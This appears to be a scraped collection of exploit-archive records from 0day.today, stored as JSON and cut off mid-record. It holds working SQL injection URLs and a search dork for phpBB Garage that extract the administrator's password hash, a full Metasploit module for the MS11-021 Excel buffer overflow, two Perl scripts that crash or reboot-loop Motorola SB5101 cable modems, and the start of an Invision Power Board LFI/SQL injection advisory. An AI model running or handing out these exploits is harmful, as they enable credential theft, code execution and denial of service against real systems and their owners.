{"type": "zdt", "lastseen": "2016-04-19T23:33:55", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability", "published": "2007-12-03T00:00:00", "href": "http://0day.today/exploit/description/2336", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category web applications", "hash": "b8928b868c4d3b33517422881d2468def74f0da7eae22043b8235c090a4f818c", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "===========================================================\r\nphpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\nTitle: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability\r\nDork: \"Powered By phpBB Garage 1.2.0\"\r\n\r\nAuthor: maku234\r\n\r\n\r\n\r\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*\r\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-2336", "sourceHref": "http://0day.today/exploit/2336", "modified": "2007-12-03T00:00:00", "reporter": "maku234", "viewCount": 1, "enchantments": {"vulnersScore": 6.0}}

{"result": {"zdt": [{"lastseen": "2016-04-20T01:20:19", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 1, "reporter": "metasploit", "published": "2011-11-04T00:00:00", "type": "zdt", "title": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-11-04T00:00:00", "href": "http://0day.today/exploit/description/16894", "id": "1337DAY-ID-16894", "sourceData": "##\r\n# $Id: ms11_021_xlb_bof.rb 14172 2011-11-06 20:16:34Z sinn3r $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Excel of Microsoft Office 2007.\r\n By supplying a malformed .xlb file, an attacker can control the content (source)\r\n of a memcpy routine, and the number of bytes to copy, therefore causing a stack-\r\n based buffer overflow. This results aribrary code execution under the context of\r\n user the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Version' => \"$Revision: 14172 $\",\r\n 'Author' =>\r\n [\r\n 'Aniway', #Initial discovery (via ZDI)\r\n 'abysssec', #RCA, poc\r\n 'sinn3r', #Metasploit\r\n 'juan vazquez' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2011-0105'],\r\n ['MSB', 'MS11-021'],\r\n ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-121/'],\r\n ['URL', 'http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'StackAdjustment' => -3500,\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n 'DisablePayloadHandler' => 'true',\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # Win XP SP3 (Vista and 7 will try to repair the file)\r\n ['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }], # JMP ESP in EXCEL (Office 2007)\r\n ['Microsoft Office Excel 2007 SP2 on Windows XP', {'Ret'=>0x3006b185}], #JMP ESP in excel\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Aug 9 2011\",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [true, 'The filename', 'msf.xlb'])\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2011-0105.xlb')\r\n f = File.open(path, 'rb')\r\n template = f.read\r\n f.close\r\n \r\n p = payload.encoded\r\n \r\n # Offset 1556\r\n record = ''\r\n record << \"\\xa7\\x00\" #record type\r\n record << \"\\x04\\x00\" #record length\r\n if target.name =~ /Excel 2007 SP2/ # Microsoft Office Excel 2007 SP2\r\n record << \"\\xb0\\x0d\\x0c\\x00\" #data\r\n else\r\n record << \"\\xb0\\x0f\\x0c\\x00\" #data\r\n end\r\n \r\n # Offset 1564\r\n continue_record = ''\r\n continue_record << \"\\x3c\\x00\" #record type\r\n continue_record << [p.length+32].pack('v') #length\r\n \r\n buf = ''\r\n buf << template[0, 1556]\r\n buf << record\r\n buf << continue_record\r\n buf << rand_text_alpha(1)\r\n buf << [target.ret].pack('V*')\r\n buf << \"\\x00\"*12\r\n buf << p\r\n buf << template[2336, template.length]\r\n \r\n file_create(buf)\r\n end\r\nend\r\n \r\n=begin\r\n0:000> r\r\neax=41414141 ebx=00000000 ecx=00000006 edx=008c1504 esi=0000007f edi=00000005\r\neip=301a263d esp=00137ef8 ebp=00137f6c iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nEXCEL!Ordinal40+0x1a263d:\r\n301a263d 8908 mov dword ptr [eax],ecx ds:0023:41414141=????????\r\n0:000> dc esp\r\n00137ef8 00000000 00000000 41414141 41414141 ........AAAAAAAA\r\n00137f08 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f18 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f28 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f38 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f48 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f58 41414141 41414141 41414141 00000000 AAAAAAAAAAAA....\r\n00137f68 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n=end\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/16894", "hash": "9bb55ebc915a4c86632af3c964efca715443ac59528b3a1a29a325a6d698735c"}, {"lastseen": "2016-04-20T02:17:34", "references": [], "description": "Exploit for hardware platform in category dos / poc", "edition": 1, "reporter": "Dillon Beresford", "published": "2010-06-08T00:00:00", "type": "zdt", "title": "Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-06-08T00:00:00", "href": "http://0day.today/exploit/description/12594", "id": "1337DAY-ID-12594", "sourceData": "========================================================\r\nMotorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC\r\n========================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n \r\n# Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC\r\n# Author: Dillon Beresford\r\n# Date: 6/6/2010\r\n# Vendor: SBHacker & Motorola\r\n# Software Link: http://www.sbhacker.net/forum/index.php\r\n# Tested on Hax0rware 1.1 R30, R32 and R39\r\n \r\n# Description: Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit\r\n# If an unauthenticated user or attacker sends any number of bytes greater than 1\r\n# to port 80 without a proper request line, such as, [ GET /somepath/file.cgi ]\r\n# the http daemon triggers a crash on thread at 0x8054b9ac Rajko HttpD.\r\n \r\n# The developer of Hax0rware said he has used the modem's local ip to bind to the webserver\r\n# to prevent attackers from triggering the vuln... This seems to be a quick fix atm.\r\n# I'm sure he will eventually fix the bug and update the firmware.\r\n \r\n# Motorola and Cable providers should warn their customers ( there are a number of legit )\r\n# customers using this firmware for testing. Its important that you let\r\n# customers know about the risk of third party firmware that isn't open source.\r\n \r\n# nc 192.168.100.1 80 <sendsomeevil>\r\n \r\n# For debugging telnet into the device 192.168.100.1 and run the poc.\r\n \r\n# >>> YIKES... looks like you may have a problem! <<<\r\n \r\n# r0/zero=00000000 r1/at =fffffffe r2/v0 =805a1800 r3/v1 =00000000\r\n# r4/a0 =8054aa58 r5/a1 =00000000 r6/a2 =00000000 r7/a3 =00000000\r\n# r8/t0 =00000000 r9/t1 =807bcae4 r10/t2 =00000041 r11/t3 =000043e0\r\n# r12/t4 =4d154e68 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005\r\n# r16/s0 =8054bacc r17/s1 =00000000 r18/s2 =805a1800 r19/s3 =00000000\r\n# r20/s4 =00000001 r21/s5 =0000002a r22/s6 =8054b848 r23/s7 =00000001\r\n# r24/t8 =00000000 r25/t9 =00000059 r26/k0 =00000000 r27/k1 =11110017\r\n# r28/gp =80458fa0 r29/sp =8054b830 r30/fp =8054b960 r31/ra =8054a514\r\n \r\n# PC : 0x8054a534 error addr: 0x00000000\r\n# cause: 0x00000008 status: 0x1000ff03\r\n \r\n# BCM interrupt enable: ffffbff7, status: 00000000\r\n# Bad PC or SP. Can't trace the stack.\r\n \r\n# Task: Rajko HttpD\r\n# ---------------------------------------------------\r\n# ID: 0x0006\r\n# Handle: 0x8054b9ac\r\n# Set Priority: 23\r\n# Current Priority: 23\r\n# State: SUSP\r\n# Stack Base: 0x8054acd4\r\n# Stack Size: 3280 bytes\r\n# Stack Used: 1940 bytes\r\n# Stack Stack Stack\r\n# TaskId TaskName Priority State Size Used Margin\r\n# ---------- -------------------------------- -------- -------- -------- -------- --------\r\n# 0x8048f818 Idle Thread 31 RUN 2048 616 1432\r\n# 0x805131d0 Network alarm support 6 SLEEP 2256 1232 1024\r\n# 0x804924c8 Network support 7 SLEEP 8192 1704 6488\r\n# 0x80513f20 pthread.00000800 15 EXIT 7852 1104 6748\r\n# 0x8048a1c8 tStartup 18 SLEEP 12288 5208 7080\r\n# 0x8054b9ac Rajko HttpD 23 SUSP 3280 1940 1340\r\n# 0x807f579c NonVol Device Async Helper 25 SLEEP 3072 504 2568\r\n# 0x807ebc7c Motorola Standby Switch Thread 23 SLEEP 4096 440 3656\r\n# 0x807ea984 Motorola Vendor Ctl Thread 23 SLEEP 4096 512 3584\r\n# 0x807f64e8 WDOG 17 RUN 5120 2784 2336\r\n# 0x807e86b4 BFC Ping Thread 29 SLEEP 6144 476 5668\r\n# 0x807e4b3c ConsoleThread 27 SLEEP 36864 2172 34692\r\n# 0x807d687c TelnetD 23 RUN 2256 1980 276\r\n# 0x807c666c CfgVB Thread 23 SLEEP 4096 504 3592\r\n# 0x807c501c DHCM 25 SLEEP 16384 512 15872\r\n# 0x807befac Event Log Thread 25 SLEEP 8192 2184 6008\r\n# 0x8079a51c Time Of Day Thread 23 SLEEP 6144 456 5688\r\n# 0x8079a98c CmDocsisIpThread 23 SLEEP 8192 504 7688\r\n# 0x80793af8 CmBpiManagerThd 25 SLEEP 8192 508 7684\r\n# 0x8078ff78 CmDsxHelper 23 SLEEP 8192 504 7688\r\n# 0x807abf50 CmDocsisCtlThread 21 SLEEP 8192 608 7584\r\n# 0x80788e44 Scan Downstream Thread 23 SLEEP 4096 1428 2668\r\n# 0x80785c20 RateShaping Thread 23 SLEEP 4096 444 3652\r\n# 0x807f65e0 CMHL 23 SLEEP 4500 368 4132\r\n# 0x807f66d8 CMHH 21 SLEEP 4500 352 4148\r\n# 0x807f67d0 ENRX 23 RUN 4500 1028 3472\r\n# 0x807f68c8 ENTX 23 SLEEP 4500 784 3716\r\n# 0x807f69c0 ELNK 23 SLEEP 4500 320 4180\r\n# 0x807f6ab8 USTX 23 SLEEP 4500 340 4160\r\n# 0x807f6bb0 USRX 23 SLEEP 4500 372 4128\r\n# 0x807f6ca8 UBCT 19 SLEEP 4500 356 4144\r\n# 0x807f6da0 USRN 23 SLEEP 4500 340 4160\r\n# 0x806a5a34 DHCP Client Thread 23 SLEEP 12288 508 11780\r\n# 0x807f6e98 IpHalIst 23 RUN 4500 844 3656\r\n# 0x8069fb98 CmPropaneCtlThread 23 SLEEP 8192 1628 6564\r\n# 0x8069cf3c IGMP Thread 23 SLEEP 4096 456 3640\r\n# 0x8069b640 NetToMedia Thread 23 SLEEP 4096 796 3300\r\n# 0x806975a8 Trap Thread 23 SLEEP 16384 516 15868\r\n# 0x807f6030 SNMP Thread 23 SLEEP 20480 1176 19304\r\n# 0x805a7f0c DHCP Server Thread 23 SLEEP 8192 1448 6744\r\n# 0x8047b410 tNonVolTimer 30 SLEEP 2048 1028 1020\r\n# Done!\r\n \r\n \r\n# * *\r\n# *** ***\r\n# *** ***\r\n# *** ***\r\n# ***** *****\r\n# ***** *****\r\n# ***** *****\r\n# ******* *******\r\n# ******* *******\r\n# ******* *******\r\n# ********* *********\r\n# ********* *********\r\n# **** *** *** ****\r\n# *** *** ***\r\n# *** * ***\r\n# ** **\r\n# ** **\r\n# ** **\r\n# ** **\r\n# * *\r\n# Motorola Corporation\r\n \r\n# +----------------------------------------------------------------------------+\r\n# | _/_/ _/_/_/_/ _/_/ |\r\n# | _/ _/ _/ _/ _/ Broadband |\r\n# | _/ _/ _/ _/ |\r\n# | _/_/ _/_/_/ _/ Foundation |\r\n# | _/ _/ _/ _/ |\r\n# | _/ _/ _/ _/ _/ Classes |\r\n# | _/_/_/ _/ _/_/ |\r\n# | |\r\n# | Copyright (c) 1999 - 2007 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.9.33.3 RELEASE |\r\n# | |\r\n# | Features: Console Nonvol Fat HeapManager SNMP Networking USB1.1 |\r\n# +----------------------------------------------------------------------------+\r\n# | Standard Embedded Target Support for BFC |\r\n# | |\r\n# | Copyright (c) 2003 - 2007 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.0.1 RELEASE |\r\n# | |\r\n# | Features: PID=0xc011 Bootloader-Rev=2.1.6d |\r\n# | Copyright (c) 2003 - 2007 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.0.1 RELEASE |\r\n# | |\r\n# | Features: PID=0xc011 Bootloader-Rev=2.1.6d |\r\n# | Features: Bootloader-Compression-Support=0x19 |\r\n# +----------------------------------------------------------------------------+\r\n# | eCos BFC Application Layer |\r\n# | |\r\n# | Copyright (c) 1999 - 2007 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.0.2 RELEASE |\r\n# | |\r\n# | Features: eCos Console Cmds, (no Idle Loop Profiler) |\r\n# +----------------------------------------------------------------------------+\r\n# | _/_/ _/ _/ |\r\n# | _/ _/ _/_/ _/_/ DOCSIS Cable Modem |\r\n# | _/ _/ _/ _/ |\r\n# | _/ _/ _/ |\r\n# | _/ _/ _/ |\r\n# | _/ _/ _/ _/ |\r\n# | _/_/ _/ _/ |\r\n# | |\r\n# | Copyright (c) 1999 - 2005 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.9.33.3 RELEASE |\r\n# | |\r\n# | Features: AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |\r\n# | Features: Support CM Vendor Extension |\r\n# +----------------------------------------------------------------------------+\r\n# | Motorola Data-Only CM Vendor Extension |\r\n# | |\r\n# | Revision: 3.0.0a RELEASE |\r\n# | |\r\n# | Features: DHCP Server HTTP Server |\r\n# +----------------------------------------------------------------------------+\r\n# | Build Date: Apr 29 2009 |\r\n# | Build Time: 15:08:51 |\r\n# | Built By: vobadm02 |\r\n# +----------------------------------------------------------------------------+\r\n \r\nuse strict;\r\nuse Socket;\r\n \r\nmy $buff = \"\\x41\" x50;\r\nmy $cablemodemip = shift || '192.168.100.1';\r\n \r\nmy $port = shift || 80;\r\n \r\nmy $proto = getprotobyname('tcp');\r\n \r\nmy $iaddr = inet_aton($cablemodemip);\r\nmy $paddr = sockaddr_in($port, $iaddr);\r\n \r\nprint \"+---------------------------------------------------------------+\\n\".\r\n \"| Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC |\\n\".\r\n \"| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\\n\".\r\n \"| Version: 1.1 R30, R32 and R39 |\\n\".\r\n \"| Vendor: Motorola Corporation and SBHacker |\\n\".\r\n \"| Author: Dillon Beresford |\\n\".\r\n \"| Date: 6/6/2010 |\\n\".\r\n \"+---------------------------------------------------------------+\\n\";\r\n \r\nsocket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die \"socket: $!\";\r\nprint \"[+] Connecting to cable modem httpd at $cablemodemip on port $port\\n\";\r\nconnect(SOCKET, $paddr) or die \"connect: $!\";\r\n \r\nprint \"[+] Sending our evil buffer...\\n\";\r\nprint SOCKET $buff.\"\\n\";\r\nprint \"[+] Payload sent\\n\";\r\nprint \"[+] This takes some time please wait.\\n\";\r\nprint \"[+] Dont look at me look at the leds on your modem\\n\";\r\nclose SOCKET or die \"close: $!\";\r\nsleep(25);\r\nprint \"[+] Bye Bye Motorola SB5101 \\n\";\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/12594", "hash": "d5a02f8acee3abf228bee90507a8e61f2e9f6e52f54bec7ced9b353bbe69ecd5"}, {"lastseen": "2016-04-20T02:22:34", "references": [], "description": "Exploit for hardware platform in category dos / poc", "edition": 1, "reporter": "Dillon Beresford", "published": "2010-06-08T00:00:00", "type": "zdt", "title": "Motorola SB5101 Hax0rware Event Reset Remote Overflow", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-06-08T00:00:00", "href": "http://0day.today/exploit/description/12593", "id": "1337DAY-ID-12593", "sourceData": "=====================================================\r\nMotorola SB5101 Hax0rware Event Reset Remote Overflow\r\n=====================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n \r\n# Motorola SB5101 Hax0rware Event Reset Remote Overflow\r\n# Tested on Hax0rware 1.1 R30, R32 and R39\r\n# Author: Dillon Beresford\r\n# Date: 6/6/2010\r\n# Vendor: Motorola Corporation and SBHacker ( SBHacker has been notified of the vuln ).\r\n# Software Link: http://www.sbhacker.net/forum/index.php\r\n# Description: Motorola SB5101 Hax0rware Event Reset Remote Buffer Overflow\r\n# An unauthenticated attacker could send multiple log reset requests to eventlog.cgi,\r\n# causing a a denial of service, which would send the cable modem into a reboot loop.\r\n# For debugging telnet into the device 192.168.100.1 and run the poc.\r\n \r\n# >>> YIKES... looks like you may have a problem! <<<\r\n \r\n# r0/zero=00000000 r1/at =80510000 r2/v0 =00000000 r3/v1 =00000002\r\n# r4/a0 =ac100102 r5/a1 =00000000 r6/a2 =00000001 r7/a3 =8069b914\r\n# r8/t0 =00000001 r9/t1 =00000000 r10/t2 =00000001 r11/t3 =00000000\r\n# r12/t4 =00000000 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005\r\n# r16/s0 =807bd04c r17/s1 =807bd004 r18/s2 =807bd000 r19/s3 =8069bb90\r\n# r20/s4 =8069bb88 r21/s5 =11110015 r22/s6 =11110016 r23/s7 =11110017\r\n# r24/t8 =00000000 r25/t9 =00000009 r26/k0 =807d2698 r27/k1 =8069bc7c\r\n# r28/gp =80458fa0 r29/sp =8069b910 r30/fp =8069b970 r31/ra =80197d24\r\n \r\n# PC : 0x80197e14 error addr: 0xac100102\r\n# cause: 0x00000010 status: 0x1000ff03\r\n \r\n# BCM interrupt enable: fffffff7, status: 00000000\r\n# Instruction at PC: 0x8c830000\r\n \r\n# entry 80197c58 called from 801dbe10\r\n# entry 801dbd08 called from 80242f64\r\n# entry 80242eb8 called from 802fb2e4\r\n# entry 802fb2ac called from 802fb2a4\r\n# entry 802fb2ac Return address (00000000) invalid. Trace stops.\r\n \r\n# Task: NetToMedia Thread\r\n# ---------------------------------------------------\r\n# ID: 0x0025\r\n# Handle: 0x8069ba24\r\n# Set Priority: 23\r\n# Current Priority: 23\r\n# State: SUSP\r\n# Stack Base: 0x8069a9b0\r\n# Stack Size: 4096 bytes\r\n# Stack Used: 1088 bytes\r\n# Stack Stack Stack\r\n# TaskId TaskName Priority State Size Used Margin\r\n# ---------- -------------------------------- -------- -------- -------- -------- --------\r\n# 0x8048f818 Idle Thread 31 RUN 2048 1064 984\r\n# 0x805131d0 Network alarm support 6 SLEEP 2256 1232 1024\r\n# 0x804924c8 Network support 7 SLEEP 8192 1824 6368\r\n# 0x80513f20 pthread.00000800 15 EXIT 7852 1104 6748\r\n# 0x8048a1c8 tStartup 18 SLEEP 12288 5208 7080\r\n# 0x8054b9ac Rajko HttpD 23 SLEEP 3280 2164 1116\r\n# 0x807f579c NonVol Device Async Helper 25 SLEEP 3072 504 2568\r\n# 0x807ebc7c Motorola Standby Switch Thread 23 SLEEP 4096 440 3656\r\n# 0x807ea984 Motorola Vendor Ctl Thread 23 SLEEP 4096 512 3584\r\n# 0x807f64e8 WDOG 17 RUN 5120 2784 2336\r\n# 0x807e8eb0 BFC Ping Thread 29 SLEEP 6144 476 5668\r\n# 0x807e870c ConsoleThread 27 RUN 36864 2168 34696\r\n# 0x807d6c58 TelnetD 23 RUN 2256 2040 216\r\n# 0x807ca564 CfgVB Thread 23 SLEEP 4096 516 3580\r\n# 0x807c5400 DHCM 25 SLEEP 16384 516 15868\r\n# 0x807bf390 Event 25 SLEEP 0 0 0 OVERFLOW\r\n# 0x8079a900 Time Of Day Thread 23 SLEEP 6144 460 5684\r\n# 0x8079ad70 CmDocsisIpThread 23 SLEEP 8192 508 7684\r\n# 0x80793edc CmBpiManagerThd 25 SLEEP 8192 512 7680\r\n# 0x8079035c CmDsxHelper 23 SLEEP 8192 508 7684\r\n# 0x807ac334 CmDocsisCtlThread 21 SLEEP 8192 516 7676\r\n# 0x80789228 Scan Downstream Thread 23 SLEEP 4096 1416 2680\r\n# 0x80786004 RateShaping Thread 23 SLEEP 4096 448 3648\r\n# 0x807f65e0 CMHL 23 SLEEP 4500 372 4128\r\n# 0x807f66d8 CMHH 21 SLEEP 4500 356 4144\r\n# 0x807f67d0 ENRX 23 SLEEP 4500 1248 3252\r\n# 0x807f68c8 ENTX 23 SLEEP 4500 788 3712\r\n# 0x807f69c0 ELNK 23 SLEEP 4500 324 4176\r\n# 0x807f6ab8 USTX 23 SLEEP 4500 344 4156\r\n# 0x807f6bb0 USRX 23 SLEEP 4500 376 4124\r\n# 0x807f6ca8 UBCT 19 SLEEP 4500 360 4140\r\n# 0x807f6da0 USRN 23 SLEEP 4500 344 4156\r\n# 0x806a5e18 DHCP Client Thread 23 SLEEP 12288 512 11776\r\n# 0x807f6e98 IpHalIst 23 RUN 4500 816 3684\r\n# 0x8069ff7c CmPropaneCtlThread 23 SLEEP 8192 1632 6560\r\n# 0x8069d320 IGMP Thread 23 SLEEP 4096 460 3636\r\n# 0x8069ba24 NetToMedia Thread 23 SUSP 4096 1088 3008\r\n# 0x8069798c Trap Thread 23 SLEEP 16384 504 15880\r\n# 0x807f6030 SNMP Thread 23 SLEEP 20480 1196 19284\r\n# 0x805aaf20 DHCP Server Thread 23 SLEEP 8192 1448 6744\r\n# 0x8047b410 tNonVolTimer 30 SLEEP 2048 292 1756\r\n \r\n# * *\r\n# *** ***\r\n# *** ***\r\n# *** ***\r\n# ***** *****\r\n# ***** *****\r\n# ***** *****\r\n# ******* *******\r\n# ******* *******\r\n# ******* *******\r\n# ********* *********\r\n# ********* *********\r\n# **** *** *** ****\r\n# *** *** ***\r\n# *** * ***\r\n# ** **\r\n# ** **\r\n# ** **\r\n# ** **\r\n# * *\r\n# Motorola Corporation\r\n \r\n# +----------------------------------------------------------------------------+\r\n# | _/_/ _/_/_/_/ _/_/ |\r\n# | _/ _/ _/ _/ _/ Broadband |\r\n# | _/ _/ _/ _/ |\r\n# | _/_/ _/_/_/ _/ Foundation |\r\n# | _/ _/ _/ _/ |\r\n# | _/ _/ _/ _/ _/ Classes |\r\n# | _/_/_/ _/ _/_/ |\r\n# | |\r\n# | Copyright (c) 1999 - 2007 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.9.33.3 RELEASE |\r\n# | |\r\n# | Features: Console Nonvol Fat HeapManager SNMP Networking USB1.1 |\r\n# +----------------------------------------------------------------------------+\r\n# | Standard Embedded Target Support for BFC |\r\n# | |\r\n# | Copyright (c) 2003 - 2007 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.0.1 RELEASE |\r\n# | |\r\n# | Features: PID=0xc011 Bootloader-Rev=2.1.6d |\r\n# | Copyright (c) 2003 - 2007 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.0.1 RELEASE |\r\n# | |\r\n# | Features: PID=0xc011 Bootloader-Rev=2.1.6d |\r\n# | Features: Bootloader-Compression-Support=0x19 |\r\n# +----------------------------------------------------------------------------+\r\n# | eCos BFC Application Layer |\r\n# | |\r\n# | Copyright (c) 1999 - 2007 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.0.2 RELEASE |\r\n# | |\r\n# | Features: eCos Console Cmds, (no Idle Loop Profiler) |\r\n# +----------------------------------------------------------------------------+\r\n# | _/_/ _/ _/ |\r\n# | _/ _/ _/_/ _/_/ DOCSIS Cable Modem |\r\n# | _/ _/ _/ _/ |\r\n# | _/ _/ _/ |\r\n# | _/ _/ _/ |\r\n# | _/ _/ _/ _/ |\r\n# | _/_/ _/ _/ |\r\n# | |\r\n# | Copyright (c) 1999 - 2005 Broadcom Corporation |\r\n# | |\r\n# | Revision: 3.9.33.3 RELEASE |\r\n# | |\r\n# | Features: AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |\r\n# | Features: Support CM Vendor Extension |\r\n# +----------------------------------------------------------------------------+\r\n# | Motorola Data-Only CM Vendor Extension |\r\n# | |\r\n# | Revision: 3.0.0a RELEASE |\r\n# | |\r\n# | Features: DHCP Server HTTP Server |\r\n# +----------------------------------------------------------------------------+\r\n# | Build Date: Apr 29 2009 |\r\n# | Build Time: 15:08:51 |\r\n# | Built By: vobadm02 |\r\n# +----------------------------------------------------------------------------+\r\n \r\nuse LWP::Simple;\r\n \r\nmy $junk = \"\\x31\" x 8096;\r\n \r\nprint \"+---------------------------------------------------------------+\\n\".\r\n \"| Motorola SB5101 Hax0rware Event Reset Remote Overflow |\\n\".\r\n \"| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\\n\".\r\n \"| Version: 1.1 R30, R32 and R39 |\\n\".\r\n \"| Vendor: Motorola Corporation and SBHacker |\\n\".\r\n \"| Author: Dillon Beresford |\\n\".\r\n \"| Date: 6/6/2010 |\\n\".\r\n \"+---------------------------------------------------------------+\\n\";\r\n \r\nfor ($count = 1; $count < 256; $count++)\r\n{\r\n $contents = get(\"http://192.168.100.1/eventlog.cgi?reset=\".$junk);\r\n print \"sending request to cable modem\\n\";\r\n}\r\n \r\nprint \"We killed it!\\n\";\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/12593", "hash": "d677d993d342cf786ba58799007f74d8d102d7ca56d61711455616ba83664fc9"}, {"lastseen": "2016-04-20T02:27:26", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 1, "reporter": "Dawid Golunski", "published": "2009-12-04T00:00:00", "title": "Invision Power Board <= 3.0.4 LFI / 2.3.6 ; 3.0.4 SQL Injection", "type": "zdt", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-12-04T00:00:00", "href": "http://0day.today/exploit/description/10083", "id": "1337DAY-ID-10083", "sourceData": "===============================================================\r\nInvision Power Board <= 3.0.4 LFI / 2.3.6 ; 3.0.4 SQL Injection\r\n===============================================================\r\n\r\n=============================================\r\n- Severity: Moderately High\r\n=============================================\r\n \r\nI. VULNERABILITY\r\n-------------------------\r\nInvision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection\r\nInvision Power Board <= 2.3.6 SQL Injection\r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\nInvision Power Board (IPB) is a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object\r\n \r\noriented code, highly-optimized SQL queries, and the fast PHP engine. A\r\n \r\ncomprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and moderators control panel. Members will appreciate the ability to subscribe to topics, send private messages, and\r\n \r\nperform a host of other options through the user control panel.\r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nFor a good understanding of the vulnerabilities it is necessary to be familiar\r\n \r\nwith the way IPB handles input data. Below is a quick trace of input\r\nvalidation process. The code snippets come from IPB version 3.0.4.\r\n \r\nline | file: admin/sources/base/ipsRegistry.php\r\n352 | static public function init()\r\n353 | {\r\n... |\r\n... |\r\n462 | IPSLib::cleanGlobals( $_GET );\r\n463 | IPSLib::cleanGlobals( $_POST );\r\n464 | IPSLib::cleanGlobals( $_COOKIE );\r\n465 | IPSLib::cleanGlobals( $_REQUEST );\r\n466 |\r\n467 | # GET first\r\n468 | $input = IPSLib::parseIncomingRecursively( $_GET, array() );\r\n469 |\r\n470 | # Then overwrite with POST\r\n \r\n471 | self::$request = IPSLib::parseIncomingRecursively( $_POST, $input );\r\n \r\n... |\r\n \r\n \r\nThe init() function cleans the input data passed via methods like GET, POST or\r\n \r\nothers at the start of each request to the forum before any of the input\r\nvariables are processed.\r\n \r\nLet's look into sanitization performed by cleanGlobals function:\r\n \r\nline | file: admin/sources/base/core.php\r\n1644 | static public function cleanGlobals( &$data, $iteration = 0 )\r\n1645 | {\r\n... |\r\n1654 | foreach( $data as $k => $v )\r\n1655 | {\r\n1656 | if ( is_array( $v ) 